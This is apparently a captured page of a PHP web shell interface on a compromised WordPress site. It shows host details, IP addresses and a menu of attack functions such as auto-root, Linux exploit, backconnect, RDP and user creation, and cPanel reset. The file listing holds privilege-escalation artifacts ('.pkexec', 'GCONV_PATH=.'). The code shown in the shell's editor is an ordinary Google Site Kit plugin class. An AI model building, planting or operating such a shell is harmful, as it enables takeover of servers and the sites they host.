Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 18.116.37.31
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
temmmp /
anonmags.com /
wp-content /
plugins /
google-site-kit /
includes /
Core /
Authentication /
Guards /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
Site_Connected_Guard.php
1.08
KB
-rw-r--r--
Using_Proxy_Connection_Guard.p...
1.11
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Using_Proxy_Connection_Guard.php
<?php /** * Class Google\Site_Kit\Core\Authentication\Guards\Using_Proxy_Connection_Guard * * @package Google\Site_Kit * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Authentication\Guards; use Google\Site_Kit\Core\Authentication\Credentials; use Google\Site_Kit\Core\Guards\Guard_Interface; /** * Class providing guard logic based on proxy connection. * * @since 1.133.0 * @access private * @ignore */ class Using_Proxy_Connection_Guard implements Guard_Interface { /** * Credentials instance. * * @var Credentials */ private Credentials $credentials; /** * Constructor. * * @since 1.133.0 * @param Credentials $credentials Credentials instance. */ public function __construct( Credentials $credentials ) { $this->credentials = $credentials; } /** * Determines whether the guarded entity can be activated or not. * * @since 1.133.0 * @return bool|\WP_Error */ public function can_activate() { return $this->credentials->using_proxy(); } }
Close